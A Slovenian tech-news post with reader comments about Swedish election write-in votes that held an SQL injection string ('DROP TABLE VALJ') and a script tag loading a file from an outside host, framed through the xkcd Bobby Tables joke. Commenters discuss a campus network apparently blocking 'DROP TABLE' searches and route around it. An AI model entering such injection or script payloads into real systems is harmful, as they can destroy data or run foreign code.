» »

Je mali Bobby Tables odrasel in se preselil na Švedsko?

Je mali Bobby Tables odrasel in se preselil na Švedsko?

Vir: Wikipedia.org

vir: Wikipedia

Vir: xkcd.com

Alice, Bob and Mallory - Na Švedskem so nekaj dni nazaj ravno končali z volitvami. Izid je bil, kot lahko vidite, zelo izenačen, Švedske oblasti pa so kasneje objavile oddane ročno napisane glasove. Med njimi se je znašel tudi:
 R;13;Hallands lãn;80;Halmstad;01;Halmstads vãstra valkrets;0904;Söndrum 4;pwn DROP TABLE VALJ;1 
Kjer je od drugega do zadnjega polja dejanski tekst na obrazcu. Je mogoče, da je mali Bobby Tables končno odrasel in se preselil na Švedsko? Za vse, ki zgodbe ne poznate, Bobby Tables prihaja iz znanega stripa http://xkcd.com/327/. Vse skupaj je verjetno le šala, a vseeno poraja misel kako resna bi bila lahko posledica škodljive SQL kode na volitvah. Nekdo si je dal duška tudi z JavaScriptom:
R;14;Vãstra Götalands lãn;80;Göteborg;03;
Göteborg, Centrum;0722;Centrum, Övre Johanneberg;(Script src=http://hittepa.webs.com/x.txt);1
Kar jih je rešilo je bilo to, da so objavili glasove kot tekst in ne kot HTML. Šaljivec je verjetno mislil, da so ga cenzorirali. Bolj verjetno to, da enostavno niso mogli vnesti vseh oklepajev, narekovajev in podobnih delov kode.

12 komentarjev

5er--> ::

Sem iskal malo na Googlu na to temo in opazil, da če v google instant vpišem "DR0P TABLE;" ta odpove sodelovanje...
 slikica

slikica



Deluje že tudi samo DR0P TABLE.

PS: Če napišem DR0P TABLE pravilno (z O-jem namesto nule), niti posta ne morem oddat... zgleda, da se tega res vsi bojijo. :D

Gandalfar ::

Meni instant pravilno dela za DROP TABLE in tudi za dr0p, kjer predlaga 'acid dr0p'

RejZoR ::

Očitno si našel nek bug Chroma, ker v Firefoxu dela ta search string čist normalno...
Angry Sheep Blog @ www.rejzor.com

5er--> ::

Sem poskusil še v Firefoxu in je isto, nato sem poskusil še na parih računalnikih v avli... ista napaka. Eduroamu na prenosniku isto. Ne morem searchat dr0p table. Stvar ni omejena na google ampak ne dela niti najdi.si, yahoo...
Posod pa je napaka "Error 101 (net::ERR_CONNECTION_RESET): Unknown error."
Zgleda so se admini na faksu malo poigrali. ;)

amigo_no1 ::

Gre[ na http://www.hidemyass.com/ in od tam na google iskanje..

stb ::

Ali pa uporabi google prek varne povezave:
https://encrypted.google.com/

Očitno admini na faksu kratijo volilno pravico tu študirajočim švedom, Slo-tech pa cenzurira debate o potencialni stranki s tem imenom :)

poweroff ::

Uuuu, tole je pa zanimivo. poročaj, kaj se zgodi, če greš na Googla preko šifrirane povezave. Ker če gre tisto skozi, "DROP TABLE" pa bna faksu ne, potem faks izvaja DPI. Kar je pa nezakonito. In če to drži, jih bom z veseljem nabil na kolac.
sudo poweroff

zee ::

DPI?
zee
Linux: Be Root, Windows: Re Boot
Giant Amazon and Google Compute Cloud in the Sky.

Senitel ::

Deep Packet Inspection

PaX_MaN ::

A je že kdo probal?


:))

Zgodovina sprememb…

  • zavarovalo slike: gzibret ()

Isotropic ::

5er--> je izjavil:

Sem poskusil še v Firefoxu in je isto, nato sem poskusil še na parih računalnikih v avli... ista napaka. Eduroamu na prenosniku isto. Ne morem searchat dr0p table. Stvar ni omejena na google ampak ne dela niti najdi.si, yahoo...
Posod pa je napaka "Error 101 (net::ERR_CONNECTION_RESET): Unknown error."
Zgleda so se admini na faksu malo poigrali. ;)

v operi dela cisto dobro, DROP TABLE ali dr0p table

Yohan del Sud ::

Ja v Operi deluje marsikaj kjer drugje cenzurirajo. In obratno. Če vpišem recimo svojo davčno ali tekoči račun, pa ga gladko cenzurira.

SI*******

SI56-****-****-****-***

Ne grem pa testirat pa testirat svoje vise.

Zanimivo, a ne.
www.strancar.com

Zgodovina sprememb…



Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

AJAX kratke naloge

Oddelek: Izdelava spletišč
192141 (1608) Yacked2
»

JavaScript v PHP-ju

Oddelek: Izdelava spletišč
6939 (724) drola
»

Menu samo v eni datoteki (brez frame-ov)

Oddelek: Izdelava spletišč
131487 (1256) R33D3M33R
»

[java] funkcija ekvivalentna print_r v PHP

Oddelek: Programiranje
161577 (1340) sverde21
»

Zaščita e-mail naslova

Oddelek: Izdelava spletišč
221475 (1089) darh

Več podobnih tem